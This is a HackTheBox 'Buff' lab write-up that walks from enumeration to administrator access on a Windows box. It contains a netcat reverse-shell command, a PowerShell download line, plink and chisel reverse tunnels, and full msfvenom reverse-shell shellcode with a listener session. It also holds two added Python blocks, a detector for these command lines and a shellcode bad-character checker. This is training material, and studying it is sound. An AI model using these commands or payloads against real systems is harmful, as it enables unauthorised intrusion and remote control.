HackTheBox: Buff


Enumeration:

Started by enumerating ports:

root@osboxes:~# scan 10.10.10.198
[*] OS based on TTL
Windows
[*] TCP Scan
Open ports: 7680,8080
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
[*] Execution time:
	 TTL: 0
	 Furious: 132
	 Nmap: 71
	 Total: 203

Intrusion:

Manually enumerated the web application until I found that it is running Gym Management Software 1.0:

Found an exploit for that particular CMS:

root@osboxes:~/Downloads# searchsploit gym
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                   | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                              | php/webapps/42801.txt
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@osboxes:~/Downloads# searchsploit -m 48506
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/Downloads/48506.py

Then used the exploit to get a reverse shell:

root@osboxes:~/Documents/Buff# python 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.15.193 443

To download the needed files onto the target, use PowerShell from the shell: powershell Invoke-WebRequest "http://<YOUR-IP>:8000/FILE" -OutFile "C:\OUT_DIR\FILENAME"

Privesc:

After some enumeration, I found an unusual file in the user's Downloads folder:

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

30/07/2020  00:29    <DIR>          .
30/07/2020  00:29    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   6,235,152,384 bytes free

Did some research and found a buffer overflow (BOF) exploit for CloudMe.

As the victim does not have Python, let's forward the port that CloudMe listens on (8888 on localhost) back to our host with plink:

C:\xampp\htdocs\gym\upload>plink.exe -l root -pw root  -R 4444:127.0.0.1:8888 10.10.15.193
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 b1:bd:fd:b1:60:8a:6f:8a:02:11:f0:79:f5:3a:a2:af
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Using username "root".
Linux osboxes 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 21:23:02 2020 from 10.10.10.198

Alternatively, you could use chisel (server on our host, client on the victim):

chisel server -p 3232 -reverse -v
SharpChisel.exe client 10.10.15.193:3232 R:127.0.0.1:4444:127.0.0.1:8888
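The three footholds above (nc.exe spawned by the web server, a PowerShell download to disk, and a plink or chisel reverse tunnel) all leave distinctive process command lines. The following is an added example, not code from the writeup, showing how a defender could flag them in process-creation telemetry. The event records are constructed to mirror the commands in this writeup (Sysmon-style fields, reduced to what the rules need) and are not real logs from the box; the rule names and the list of web-server parent images are my own choices.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events shaped like the commands used in this writeup.
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\xampp\htdocs\gym\upload\nc.exe",
     "cmdline": r"nc.exe -e cmd.exe 10.10.15.193 443",
     "parent": r"C:\xampp\apache\bin\httpd.exe"},
    {"pid": 1002, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell Invoke-WebRequest "http://10.10.15.193:8000/plink.exe" -OutFile "C:\xampp\htdocs\gym\upload\plink.exe"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"pid": 1003, "image": r"C:\xampp\htdocs\gym\upload\plink.exe",
     "cmdline": r"plink.exe -l root -pw root -R 4444:127.0.0.1:8888 10.10.15.193",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"pid": 1004, "image": r"C:\Users\shaun\SharpChisel.exe",
     "cmdline": r"SharpChisel.exe client 10.10.15.193:3232 R:127.0.0.1:4444:127.0.0.1:8888",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"pid": 1005, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\shaun\notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
]

# Command-line patterns, matched case-insensitively (rule names are assumptions).
RULES = {
    "netcat_exec_redirect": re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+\S+", re.I),
    "plink_reverse_tunnel": re.compile(r"\bplink(?:\.exe)?\b.*\s-R\s+\d+:\S+:\d+", re.I),
    "chisel_reverse_forward": re.compile(r"chisel\S*\s+client\s+\S+\s+R:", re.I),
    "powershell_download_to_disk": re.compile(r"Invoke-WebRequest\b.*-OutFile", re.I),
}

# Web-server processes that should not normally spawn children (assumed list).
WEB_SERVER_PARENTS = {"httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}

# plink's -R syntax: -R <remote_port>:<local_host>:<local_port>
PLINK_R = re.compile(r"-R\s+(\d+):([^:\s]+):(\d+)")


def detect(events):
    """Return (pid, rule_name) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits.append((ev["pid"], name))
        # Web server spawning anything at all is the webshell tell-tale.
        parent = PureWindowsPath(ev["parent"]).name.lower()
        if parent in WEB_SERVER_PARENTS:
            hits.append((ev["pid"], "web_server_spawned_process"))
    return hits


def parse_plink_reverse(cmdline):
    """Extract which internal service a plink -R tunnel exposes, or None."""
    m = PLINK_R.search(cmdline)
    if not m:
        return None
    return {"remote_port": int(m.group(1)),
            "local_host": m.group(2),
            "local_port": int(m.group(3))}


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print(parse_plink_reverse(SAMPLE_EVENTS[2]["cmdline"]))
```

The parent-process rule is the most robust of the five: renaming nc.exe or plink.exe defeats the command-line regexes, but httpd.exe spawning cmd.exe is abnormal regardless of the child's name. The tunnel parser is there so an analyst can see immediately that the forward targets 127.0.0.1:8888, i.e. a service bound only to localhost is being exposed.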

Then created our own shellcode payload using msfvenom, excluding the bad characters \x00, \x0a and \x0d and emitting it in Python format so it can be pasted into the exploit:

root@osboxes:~/Downloads# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.193 LPORT=5555 -a x86 -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xdb\xcc\xd9\x74\x24\xf4\xba\x46\xc9\x1f\xe1\x5b\x29"
buf += b"\xc9\xb1\x52\x31\x53\x17\x03\x53\x17\x83\xad\x35\xfd"
buf += b"\x14\xcd\x2e\x80\xd7\x2d\xaf\xe5\x5e\xc8\x9e\x25\x04"
buf += b"\x99\xb1\x95\x4e\xcf\x3d\x5d\x02\xfb\xb6\x13\x8b\x0c"
buf += b"\x7e\x99\xed\x23\x7f\xb2\xce\x22\x03\xc9\x02\x84\x3a"
buf += b"\x02\x57\xc5\x7b\x7f\x9a\x97\xd4\x0b\x09\x07\x50\x41"
buf += b"\x92\xac\x2a\x47\x92\x51\xfa\x66\xb3\xc4\x70\x31\x13"
buf += b"\xe7\x55\x49\x1a\xff\xba\x74\xd4\x74\x08\x02\xe7\x5c"
buf += b"\x40\xeb\x44\xa1\x6c\x1e\x94\xe6\x4b\xc1\xe3\x1e\xa8"
buf += b"\x7c\xf4\xe5\xd2\x5a\x71\xfd\x75\x28\x21\xd9\x84\xfd"
buf += b"\xb4\xaa\x8b\x4a\xb2\xf4\x8f\x4d\x17\x8f\xb4\xc6\x96"
buf += b"\x5f\x3d\x9c\xbc\x7b\x65\x46\xdc\xda\xc3\x29\xe1\x3c"
buf += b"\xac\x96\x47\x37\x41\xc2\xf5\x1a\x0e\x27\x34\xa4\xce"
buf += b"\x2f\x4f\xd7\xfc\xf0\xfb\x7f\x4d\x78\x22\x78\xb2\x53"
buf += b"\x92\x16\x4d\x5c\xe3\x3f\x8a\x08\xb3\x57\x3b\x31\x58"
buf += b"\xa7\xc4\xe4\xcf\xf7\x6a\x57\xb0\xa7\xca\x07\x58\xad"
buf += b"\xc4\x78\x78\xce\x0e\x11\x13\x35\xd9\x14\xee\x3a\xd8"
buf += b"\x41\xec\x44\xcf\x22\x79\xa2\x85\x54\x2c\x7d\x32\xcc"
buf += b"\x75\xf5\xa3\x11\xa0\x70\xe3\x9a\x47\x85\xaa\x6a\x2d"
buf += b"\x95\x5b\x9b\x78\xc7\xca\xa4\x56\x6f\x90\x37\x3d\x6f"
buf += b"\xdf\x2b\xea\x38\x88\x9a\xe3\xac\x24\x84\x5d\xd2\xb4"
buf += b"\x50\xa5\x56\x63\xa1\x28\x57\xe6\x9d\x0e\x47\x3e\x1d"
buf += b"\x0b\x33\xee\x48\xc5\xed\x48\x23\xa7\x47\x03\x98\x61"
buf += b"\x0f\xd2\xd2\xb1\x49\xdb\x3e\x44\xb5\x6a\x97\x11\xca"
buf += b"\x43\x7f\x96\xb3\xb9\x1f\x59\x6e\x7a\x2f\x10\x32\x2b"
buf += b"\xb8\xfd\xa7\x69\xa5\xfd\x12\xad\xd0\x7d\x96\x4e\x27"
buf += b"\x9d\xd3\x4b\x63\x19\x08\x26\xfc\xcc\x2e\x95\xfd\xc4"
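Before pasting a buffer like the one above into an exploit it is worth confirming two things the tool output claims: that the byte count matches the reported size and that none of the characters passed with -b survived encoding. The following is an added example, not part of the writeup, that parses msfvenom's -f python output and audits it against the bad-character list. The short clean sample reuses the first two payload lines printed above; the second sample is constructed to contain a 0x0a byte so the check has something to find.

```python
import re

# Bad characters passed to msfvenom with -b in this writeup.
BAD_CHARS = b"\x00\x0a\x0d"

# First two payload lines from the msfvenom output above (26 bytes).
CLEAN_SAMPLE = r'''buf =  b""
buf += b"\xdb\xcc\xd9\x74\x24\xf4\xba\x46\xc9\x1f\xe1\x5b\x29"
buf += b"\xc9\xb1\x52\x31\x53\x17\x03\x53\x17\x83\xad\x35\xfd"
'''

# Constructed sample containing a newline byte (0x0a) at offset 2.
BAD_SAMPLE = r'''buf =  b""
buf += b"\x31\xc0\x0a\x90"
'''

# One line of `-f python` output: buf = b"" or buf += b"\xNN\xNN..."
LINE_RX = re.compile(r'^buf\s*\+?=\s*b"((?:\\x[0-9a-fA-F]{2})*)"\s*$')
HEX_RX = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_msfvenom_python(text):
    """Reassemble the raw payload bytes from msfvenom -f python text."""
    buf = bytearray()
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RX.match(line.strip())
        if not m:
            raise ValueError(f"line {n}: not an msfvenom -f python line: {line!r}")
        buf += bytes(int(h, 16) for h in HEX_RX.findall(m.group(1)))
    return bytes(buf)


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return (offset, byte) for every occurrence of a forbidden byte."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def audit(text, expected_size=None, bad=BAD_CHARS):
    """Size and bad-char report for one msfvenom -f python dump."""
    payload = parse_msfvenom_python(text)
    return {
        "size": len(payload),
        "size_ok": expected_size is None or len(payload) == expected_size,
        "bad_offsets": find_bad_chars(payload, bad),
    }


if __name__ == "__main__":
    print(audit(CLEAN_SAMPLE, expected_size=26))
    print(audit(BAD_SAMPLE))
```

Run against the full 351-byte dump from the writeup with expected_size=351, a clean report means the encoder honoured the -b list; any offset reported would truncate or corrupt the payload once it passes through the vulnerable service's string handling, which is exactly why those three bytes were excluded.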

Finally, replaced the exploit's payload with it, started a listener with nc (wrapped in rlwrap) and ran the exploit against the forwarded port:

root@osboxes:~# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.198] 49842
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
WRITTEN BY
ITasahobby
InTernet lover